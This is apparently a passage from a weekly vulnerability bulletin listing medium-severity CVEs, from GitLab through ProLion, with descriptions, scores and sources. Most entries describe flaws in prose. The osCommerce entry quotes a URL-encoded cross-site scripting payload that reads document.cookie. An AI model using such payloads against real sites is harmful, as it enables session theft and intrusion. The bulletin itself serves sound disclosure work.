gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading to incorrect representation in the UI. 2023-12-15 4.8 CVE-2023-5512
cve@gitlab.com
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, the saved search feature can be used to perform a SQL injection. Version 10.0.11 contains a patch for the issue. 2023-12-13 6.5 CVE-2023-43813
security-advisories@github.com
goodix — fingerprint_sensor_firmware The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker’s fingerprint. 2023-12-09 6.4 CVE-2023-50430
cve@mitre.org
google — android There is a possible way for the secure world to write to NS memory due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48405
dsap-vuln-management@google.com
google — android There is a possible permanent DoS or way for the modem to boot unverified firmware due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48406
dsap-vuln-management@google.com
google — android In the Pixel Camera Driver, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.7 CVE-2023-48414
dsap-vuln-management@google.com
google — android There is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 6.4 CVE-2023-48420
dsap-vuln-management@google.com
google — android In ProtocolMiscATCommandAdapter::Init() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48399
dsap-vuln-management@google.com
google — android In GetSizeOfEenlRecords of protocoladapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48401
dsap-vuln-management@google.com
google — android In ProtocolNetSimFileInfoAdapter() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48408
dsap-vuln-management@google.com
google — android In SignalStrengthAdapter::FillGsmSignalStrength() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48411
dsap-vuln-management@google.com
google — android In private_handle_t of mali_gralloc_buffer.h, there is a possible information leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48412
dsap-vuln-management@google.com
google — android In Init of protocolembmsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48415
dsap-vuln-management@google.com
google — android In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 5.5 CVE-2023-48422
dsap-vuln-management@google.com
google — android In Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 4.9 CVE-2023-48397
dsap-vuln-management@google.com
google — android In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 4.9 CVE-2023-48413
dsap-vuln-management@google.com
gpac — gpac An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service (DoS) via the ctts_box_read function of file src/isomedia/box_code_base.c. 2023-12-09 5.5 CVE-2023-47465
cve@mitre.org
h2o — h2o h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. In version 2.3.0-beta2 and prior, when h2o is configured to listen to multiple addresses or ports with each of them using different backend servers managed by multiple entities, a malicious backend entity that also has the opportunity to observe or inject packets exchanged between the client and h2o may misdirect HTTPS requests going to other backends and observe the contents of that HTTPS request being sent. The attack involves a victim client trying to resume a TLS connection and an attacker redirecting the packets to a different address or port than that intended by the client. The attacker must already have been configured by the administrator of h2o to act as a backend to one of the addresses or ports that the h2o instance listens to. Session IDs and tickets generated by h2o are not bound to information specific to the server address, port, or the X.509 certificate, and therefore it is possible for an attacker to force the victim connection to wrongfully resume against a different server address or port on which the same h2o instance is listening. Once a TLS session is misdirected to resume to a server address / port that is configured to use an attacker-controlled server as the backend, depending on the configuration, HTTPS requests from the victim client may be forwarded to the attacker’s server. An H2O instance is vulnerable to this attack only if the instance is configured to listen to different addresses or ports using the listen directive at the host level and the instance is configured to connect to backend servers managed by multiple entities. A patch is available at commit 35760540337a47e5150da0f4a66a609fad2ef0ab. As a workaround, one may stop using host-level listen directives in favor of global-level ones. 2023-12-12 6.1 CVE-2023-41337
security-advisories@github.com
haxx — curl When saving HSTS data to an excessively long file name, curl could end up removing all contents, making subsequent requests using that file unaware of the HSTS status they should otherwise use. 2023-12-12 5.3 CVE-2023-46219
support@hackerone.com
hitachi — system_management_unit_firmware SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles. 2023-12-11 6.5 CVE-2023-6538
security.vulnerabilities@hitachivantara.com
hitachi_energy — rtu500 A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to user input being improperly sanitized. 2023-12-14 5.4 CVE-2023-5769
cybersecurity@hitachienergy.com
home-assistant — core Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. 2023-12-15 4.3 CVE-2023-50715
security-advisories@github.com
honojs — hono Hono is a web framework written in TypeScript. Prior to version 3.11.7, clients may override named path parameter values from previous requests if the application is using TrieRouter. So, there is a risk that a privileged user may use unintended parameters when deleting REST API resources. TrieRouter is used either explicitly or when the application matches a pattern that is not supported by the default RegExpRouter. Version 3.11.7 includes the change to fix this issue. As a workaround, avoid using TrieRouter directly. 2023-12-14 4.2 CVE-2023-50710
security-advisories@github.com
html-js — doracms An arbitrary file upload vulnerability in DoraCMS v2.1.8 allows attackers to execute arbitrary code via uploading a crafted HTML or image file to the user avatar. 2023-12-08 5.4 CVE-2023-49444
cve@mitre.org
ibm — api_connect IBM API Connect V10.0.5.3 and V10.0.6.0 stores user credentials in browser cache which can be read by a local user. IBM X-Force ID: 271912. 2023-12-09 5.5 CVE-2023-47722
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270. 2023-12-14 6.2 CVE-2023-45184
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 archecker is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251204. 2023-12-09 5.5 CVE-2023-28526
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251206. 2023-12-09 5.5 CVE-2023-28527
psirt@us.ibm.com
ibm — spectrum_scale IBM Spectrum Scale 5.1.5.0 through 5.1.5.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 239080. 2023-12-14 5.9 CVE-2022-43843
psirt@us.ibm.com
ibm — system_storage_virtualization_engine IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651. 2023-12-13 4.3 CVE-2023-49877
psirt@us.ibm.com
ibm — system_storage_virtualization_engine IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 272652. 2023-12-13 4.3 CVE-2023-49878
psirt@us.ibm.com
idemia — multiple_products When reading DesFire keys, the function that reads the card isn’t properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key. 2023-12-15 6.8 CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — multiple_products When handling contactless cards, usage of a specific function to get additional information from the card which doesn’t check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 6.8 CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
in2code — femanager The femanager extension before 5.5.2, 6.x before 6.3.3, and 7.x before 7.0.1 for TYPO3 allows creation of frontend users in restricted groups (if there is a usergroup field on the registration form). This occurs because the usergroup.inList protection mechanism is mishandled. 2023-12-12 5.3 CVE-2022-44543
cve@mitre.org
iteachyou — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a cross-site scripting (XSS) vulnerability in the article management department. 2023-12-08 5.4 CVE-2023-49484
cve@mitre.org
jetbrains — teamcity In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible. 2023-12-15 4.3 CVE-2023-50870
cve@jetbrains.com
jetbrains — youtrack In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed. 2023-12-15 4.3 CVE-2023-50871
cve@jetbrains.com
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department. 2023-12-08 5.4 CVE-2023-49485
cve@mitre.org
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the model management department. 2023-12-08 5.4 CVE-2023-49486
cve@mitre.org
jfinalcms_project — jfinalcms JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the navigation management department. 2023-12-08 5.4 CVE-2023-49487
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing. 2023-12-14 5.4 CVE-2023-50100
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via Label management editing. 2023-12-14 5.4 CVE-2023-50101
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS). 2023-12-14 5.4 CVE-2023-50102
cve@mitre.org
jfinalcms_project — jfinalcms JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office. 2023-12-14 5.4 CVE-2023-50137
cve@mitre.org
jqlang — jq jq is a command-line JSON processor. Version 1.7 is vulnerable to heap-based buffer overflow. Version 1.7.1 contains a patch for this issue. 2023-12-13 6.2 CVE-2023-50246
security-advisories@github.com
jqlang — jq jq is a command-line JSON processor. Version 1.7 is vulnerable to stack-based buffer overflow in builds using decNumber. Version 1.7.1 contains a patch for this issue. 2023-12-13 6.2 CVE-2023-50268
security-advisories@github.com
jupyter — dockerspawner dockerspawner is a tool to spawn JupyterHub single user servers in Docker containers. Users of JupyterHub deployments running DockerSpawner starting with 0.11.0 without specifying `DockerSpawner.allowed_images` configuration allow users to launch _any_ pullable docker image, instead of restricting to only the single configured image, as intended. This issue has been addressed in commit `3ba4b665b` which has been included in dockerspawner release version 13. Users are advised to upgrade. Users unable to upgrade should explicitly set `DockerSpawner.allowed_images` to a non-empty list containing only the default image, which will result in the intended default behavior. 2023-12-08 4.3 CVE-2023-48311
security-advisories@github.com
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system. It has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read the database. 2023-12-15 6.5 CVE-2023-48395
twcert@cert.org.tw
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from an error message. 2023-12-15 4.3 CVE-2023-48393
twcert@cert.org.tw
kalcaddle — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. 2023-12-16 6.3 CVE-2023-6850
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. 2023-12-16 6.3 CVE-2023-6851
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. 2023-12-16 6.3 CVE-2023-6852
cna@vuldb.com
kalcaddle — kodexplorer A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. 2023-12-16 6.3 CVE-2023-6853
cna@vuldb.com
keycloak — keycloak A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748. 2023-12-14 4.6 CVE-2023-6134
secalert@redhat.com
koush — scrypted Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner` and `pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available. 2023-12-13 6.1 CVE-2023-47620
security-advisories@github.com
koush — scrypted Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available. 2023-12-13 6.1 CVE-2023-47623
security-advisories@github.com
linux — kernel sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized. 2023-12-09 5.5 CVE-2023-50431
cve@mitre.org
linux — kernel An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system. 2023-12-09 5.5 CVE-2023-6560
secalert@redhat.com
linux — kernel A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service. 2023-12-08 5.5 CVE-2023-6622
secalert@redhat.com
linux — kernel A null pointer dereference vulnerability was found in dpll_pin_parent_pin_set() in drivers/dpll/dpll_netlink.c in the Digital Phase Locked Loop (DPLL) subsystem in the Linux kernel. This issue could be exploited to trigger a denial of service. 2023-12-11 5.5 CVE-2023-6679
secalert@redhat.com
mantisbt — linked_custom_fields The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs. Prior to version 2.0.1, cross-site scripting in the MantisBT LinkedCustomFields plugin allows Javascript execution, when a crafted Custom Field is linked via the plugin and displayed when reporting a new Issue or editing an existing one. This issue is fixed in version 2.0.1. As a workaround, one may utilize MantisBT’s default Content Security Policy, which blocks script execution. 2023-12-11 6.1 CVE-2023-49802
security-advisories@github.com
mattermost — mattermost Mattermost fails to handle a null request body in the /add endpoint, allowing a simple member to send a request with null request body to that endpoint and make it crash. After a few repetitions, the plugin is disabled.  2023-12-12 6.5 CVE-2023-49809
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to perform authorization checks in the /plugins/playbooks/api/v0/runs/add-to-timeline-dialog endpoint of the Playbooks plugin allowing an attacker to get limited information about a post if they know the post ID 2023-12-12 5.3 CVE-2023-46701
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to validate team membership when a user attempts to access a playbook, allowing a user with permissions to a playbook but no permissions to the team the playbook is on to access and modify the playbook. This can happen if the user was once a member of the team, got permissions to the playbook and was then removed from the team.  2023-12-12 5.4 CVE-2023-6547
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to check whether a user is a guest when updating the tasks of a private playbook run allowing a guest to update the tasks of a private playbook run if they know the run ID. 2023-12-12 4.3 CVE-2023-49874
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to perform correct authorization checks when creating a playbook action, allowing users without access to the playbook to create playbook actions. If the playbook action created is to post a message in a channel based on specific keywords in a post, some playbook information, like the name, can be leaked.  2023-12-12 4.3 CVE-2023-6727
responsibledisclosure@mattermost.com
microfocus — arcsight_management_center A potential vulnerability has been identified in Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited resulting in stored Cross-Site Scripting (XSS). 2023-12-09 5.4 CVE-2020-25835
security@opentext.com
microsoft — 365_apps Microsoft Outlook Information Disclosure Vulnerability 2023-12-12 6.5 CVE-2023-35636
secure@microsoft.com
microsoft — azure_devops_serve Azure DevOps Server Spoofing Vulnerability 2023-12-14 6.5 CVE-2023-21751
secure@microsoft.com
microsoft — azure_machine_learning_software_development_kit Azure Machine Learning Compute Instance for SDK Users Information Disclosure Vulnerability 2023-12-12 4.7 CVE-2023-35625
secure@microsoft.com
microsoft — dynamics_365 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability 2023-12-12 5.4 CVE-2023-36020
secure@microsoft.com
microsoft — edge Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability 2023-12-15 4.3 CVE-2023-36878
secure@microsoft.com
microsoft — microsoft_office Microsoft Word Information Disclosure Vulnerability 2023-12-12 5.5 CVE-2023-36009
secure@microsoft.com
microsoft — office_long_term_servicing_channel Microsoft Outlook for Mac Spoofing Vulnerability 2023-12-12 5.3 CVE-2023-35619
secure@microsoft.com
microsoft — windows_10 XAML Diagnostics Elevation of Privilege Vulnerability 2023-12-12 6.7 CVE-2023-36003
secure@microsoft.com
microsoft — windows_10_1507 Microsoft USBHUB 3.0 Device Driver Remote Code Execution Vulnerability 2023-12-12 6.8 CVE-2023-35629
secure@microsoft.com
microsoft — windows_10_1507 Internet Connection Sharing (ICS) Denial of Service Vulnerability 2023-12-12 6.5 CVE-2023-35642
secure@microsoft.com
microsoft — windows_11_22h2 Windows Kernel Denial of Service Vulnerability 2023-12-12 5.5 CVE-2023-35635
secure@microsoft.com
microsoft — windows_server DHCP Server Service Information Disclosure Vulnerability 2023-12-12 5.3 CVE-2023-36012
secure@microsoft.com
microweber — microweber Missing Standardized Error Handling Mechanism in GitHub repository microweber/microweber prior to 2.0. 2023-12-08 4.3 CVE-2023-6599
security@huntr.dev
mindsdb — mindsdb MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a server-side request forgery vulnerability in `file.py`. This can lead to limited information disclosure. Users should use MindsDB’s `staging` branch or v23.11.4.1, which contain a fix for the issue. 2023-12-11 5.3 CVE-2023-49795
security-advisories@github.com
mindsdb — mindsdb MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py`. Users should use MindsDB’s `staging` branch or v23.11.4.1, which contain a fix for the issue. 2023-12-11 5.3 CVE-2023-49796
security-advisories@github.com
mojotv — base64captcha When using the default implementation of Verify to check a Captcha, verification can be bypassed. For example, if the first parameter is a non-existent id, the second parameter is an empty string, and the third parameter is true, the function will always consider the Captcha to be correct. 2023-12-11 5.3 CVE-2023-45292
security@golang.org
monicahq — monica A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user. 2023-12-11 5.4 CVE-2023-50465
cve@mitre.org
morpheus65535 — bazarr Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. 2023-12-15 5.3 CVE-2023-50266
security-advisories@github.com
naturalintelligence — fast_xml_parser fast-xml-parser before 4.1.2 allows __proto__ for Prototype Pollution. 2023-12-12 6.5 CVE-2023-26920
cve@mitre.org
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read the contents of arbitrary files on the operating system by creating a symbolic link. 2023-12-09 6.5 CVE-2023-28869
cve@mitre.org
ncp-e — secure_enterprise_client Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts. 2023-12-09 6.5 CVE-2023-28870
cve@mitre.org
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link. 2023-12-09 4.3 CVE-2023-28871
cve@mitre.org
netapp — ontap_9 ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. 2023-12-15 4.3 CVE-2023-27317
security-alert@netapp.com
octokit/webhooks — octokit/webhooks octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. 2023-12-15 5.4 CVE-2023-50728
security-advisories@github.com
octopus_deploy — octopus_server In affected versions of Octopus Server it is possible for the OpenID client secret to be logged in clear text during the configuration of Octopus Server. 2023-12-14 4.2 CVE-2023-1904
security@octopus.com
openfiler — openfiler A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter. 2023-12-11 6.1 CVE-2023-49488
cve@mitre.org
oretnom23 — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247253 was assigned to this vulnerability. 2023-12-08 6.1 CVE-2023-6616
cna@vuldb.com
oscommerce — oscommerce A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 6.1 CVE-2023-6609
cna@vuldb.com
otcms — otcms A vulnerability, which was classified as critical, was found in OTCMS 7.01. Affected is an unknown function of the file /admin/ind_backstage.php. The manipulation of the argument sqlContent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247908. 2023-12-13 4.7 CVE-2023-6772
cna@vuldb.com
palo_alto_networks — pan-os An OS command injection vulnerability in the XML API of Palo Alto Networks PAN-OS software enables an authenticated API user to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6792
psirt@paloaltonetworks.com
palo_alto_networks — pan-os An arbitrary file upload vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-write administrator with access to the web interface to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6794
psirt@paloaltonetworks.com
palo_alto_networks — pan-os An OS command injection vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall. 2023-12-13 5.5 CVE-2023-6795
psirt@paloaltonetworks.com
palo_alto_networks — pan-os A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface. Then, when viewed by a properly authenticated administrator, the JavaScript payload executes and disguises all associated actions as performed by that unsuspecting authenticated administrator. 2023-12-13 4.3 CVE-2023-6789
psirt@paloaltonetworks.com
palo_alto_networks — pan-os A credential disclosure vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to obtain the plaintext credentials of stored external system integrations such as LDAP, SCP, RADIUS, TACACS+, and SNMP from the web interface. 2023-12-13 4.9 CVE-2023-6791
psirt@paloaltonetworks.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability has been found in PHPGurukul Teacher Subject Allocation Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file index.php. The manipulation of the argument searchdata with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-247342 is the identifier assigned to this vulnerability. 2023-12-10 6.1 CVE-2023-6649
cna@vuldb.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability was found in PHPGurukul Teacher Subject Allocation Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/subject.php of the component Create a new Subject. The manipulation of the argument cid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247346 is the identifier assigned to this vulnerability. 2023-12-10 4.3 CVE-2023-6653
cna@vuldb.com
phpgurukul — teacher_subject_allocation_management_system A vulnerability classified as problematic has been found in PHPGurukul Teacher Subject Allocation Management System 1.0. Affected is an unknown function of the file /admin/course.php of the component Delete Course Handler. The manipulation of the argument delid leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247896. 2023-12-13 4.3 CVE-2023-6766
cna@vuldb.com
postgresql — postgresql A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with ‘unknown’-type arguments. Handling ‘unknown’-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory. 2023-12-10 4.3 CVE-2023-5868
secalert@redhat.com
postgresql — postgresql A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack. 2023-12-10 4.4 CVE-2023-5870
secalert@redhat.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate information related to a registered device being monitored by WhatsUp Gold. 2023-12-14 5.9 CVE-2023-6368
security@progress.com
prolion — cryptospike Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters. 2023-12-12 6.5 CVE-2023-36654
cve@mitre.org
prolion — cryptospike A SQL Injection in the users searching REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to read database data via SQL commands injected in the search parameter. 2023-12-12 4.3 CVE-2023-36652
cve@mitre.org
